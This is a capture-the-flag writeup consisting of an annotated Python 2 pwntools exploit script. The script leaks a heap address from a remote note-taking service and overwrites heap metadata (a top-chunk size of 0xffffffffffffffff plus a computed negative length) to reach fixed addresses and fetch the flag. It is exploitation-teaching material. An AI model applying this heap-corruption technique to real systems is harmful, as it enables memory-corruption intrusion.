Tags: pwn 

Rating: 1.0

```
from pwn import *
import time
# Session setup: gdb windows open in a horizontal tmux split, every byte
# sent or received on the tube is logged (log_level="debug"), and `p` is a
# TCP connection to the host/port hard-coded in the writeup.  The commented
# out process()/gdb.attach() lines below are the local-debugging variant.
context.update(terminal=["tmux", "splitw", "-h"], log_level="debug")
p = remote("51.15.73.163", 8888)

#p = process("./service.o")
#gdb.attach(p)

def add_note(title, note, body=False, l=0x90-160):
    """Drive menu option 1 (create note) on the global connection `p`.

    Answers the length prompt with `l` (default 0x90-160 = -16, i.e. a
    negative length) and the title prompt with `title`, then waits for the
    body prompt.  `note` is sent only when `body` is something other than
    False; no caller on this page passes `body`, so the body prompt is left
    unanswered.  The closing `p.recvuntil` is an attribute access without a
    call and does nothing — the following menu prompt is presumably consumed
    by the next helper's recvuntil; TODO confirm against the service before
    reordering calls.
    """
    replies = [
        ("Enter note length> ", str(l)),
        ("Enter title> ", title),
    ]
    p.sendline("1")
    for prompt, answer in replies:
        p.recvuntil(prompt)
        p.sendline(answer)
    p.recvuntil("Enter note body> ")
    if body != False:
        p.sendline(note)
    p.recvuntil  # no-op: attribute lookup only, never called (kept as in the original)

def delete_note(index, shell=False):
    """Drive menu option 2 (delete note) on the global connection `p`.

    With the default `shell=False` the index prompt is answered with
    `index` and the following "> " menu prompt is consumed.  Any other
    `shell` value selects the option and then hands the socket to the
    operator via `p.interactive()` without ever sending an index.
    """
    p.sendline("2")
    if shell != False:
        p.interactive()
        return
    p.recvuntil("Enter note index> ")
    p.sendline(str(index))
    p.recvuntil("> \n")

def edit_note(index, title, body):
    """Drive menu option 3 (edit note) on the global connection `p`.

    Answers the index, title and body prompts in that order and then
    consumes the following "> " menu prompt.  Defined here but not called
    anywhere on this page.
    """
    exchange = (
        ("Enter note index> ", str(index)),
        ("Enter title> ", title),
        ("Enter note body> ", body),
    )
    p.sendline("3")
    for prompt, answer in exchange:
        p.recvuntil(prompt)
        p.sendline(answer)
    p.recvuntil("> \n")

def print_note(index):
    """Drive menu option 4 (print note) and return the raw response.

    Everything the service sends after the index is answered, up to and
    including the next "> " menu prompt, is echoed to stdout and returned
    unchanged (a Python 2 `str`), so callers slice it to extract fields.
    """
    p.sendline("4")
    p.recvuntil("Enter note index> ")
    p.sendline(str(index))
    response = p.recvuntil("> \n")
    print(response)
    return response

def exit_prog():
    """Send menu option 5 (exit) on the global connection `p`; nothing is read back."""
    p.sendline("5")

# --- Main flow (Python 2 pwntools script) -----------------------------------
# NOTE(review): every value below (the host/port above, the slice offsets,
# 0xcafeb000 / 0xdeadb038, the 0x280 adjustment) is specific to the challenge
# instance in this writeup.  The helpers block on exact prompt strings, so any
# mismatch with what the service prints hangs the script instead of failing.
p.recv(1024)  # drain the initial banner/menu (at most 1024 bytes)

# Six notes with 0x8f-byte titles.  add_note's default body=False means the
# "" note body is never sent, and its default length 0x90-160 is negative (-16).
add_note("A"*0x8f, "")
add_note("B"*0x8f, "")
add_note("C"*0x8f, "")
add_note("D"*0x8f, "")
add_note("E"*0x8f, "")
add_note("F"*0x8f, "")
# Free notes 4, 2 and 0, leaving 1, 3 and 5 in place.
delete_note(4)
delete_note(2)
delete_note(0)

# Read note 1 back and keep the 4 bytes at offset 0x9f of the raw response.
heapbase = print_note(1)[0x9f:0xa3]
log.info(heapbase.encode("hex"))  # Python 2 str.encode("hex"): hex dump of the raw bytes
# Any newline byte inside the slice is treated as NUL before unpacking.
heapbase = heapbase.replace("\n","\x00")
log.info(heapbase.encode("hex"))
# Right-pad with NUL to 4 bytes (in case the slice came back short), unpack as a
# little-endian 32-bit value, and subtract 0x280 to get what is logged as the heap base.
heapbase = u32(heapbase + "\x00"*(4-len(heapbase)))-0x280

log.info("Heap base @: " + hex(heapbase))

# Free the remaining notes 1, 3 and 5.
delete_note(1)
delete_note(3)
delete_note(5)

# Title payload: 0x80 filler bytes followed by two packed 64-bit values
# (0 and 0xffffffffffffffff).  The two continuation lines are part of this
# single expression.
payload = "A"*0x80 + \
p64(0) + \
p64(0xffffffffffffffff)

# Create a note with that payload as the title and length 0x80-160 = -32.
add_note(payload, "", l=0x80-160)

# The next note's length is computed from the derived heap base and the
# hard-coded 0xcafeb000 constant (the same -160 as add_note's default length
# is applied).  0xcafeb000 and 0xdeadb038 presumably are fixed addresses in
# the challenge binary — confirm against it before reuse.
offset = 0xcafeb000+0x8*5 - 0x8*2 - (heapbase + 0xa0)
add_note("B"*158,"", l = offset-160)
# Third note: the title is four packed 64-bit constants followed by the
# literal string "GIMMETHEFLAG".
add_note(p64(0xcafeb0e0)+p64(0xcafeb0c0)+p64(0xdeadb038) + p64(0xdeadb040) + "GIMMETHEFLAG" , "")
# Menu option 6 is not one of the five options wrapped by the helpers above.
p.sendline("6")
p.recv(1024)  # drain whatever the service prints in response (at most 1024 bytes)
print_note(4)  # print_note echoes the raw response for note 4 to stdout
```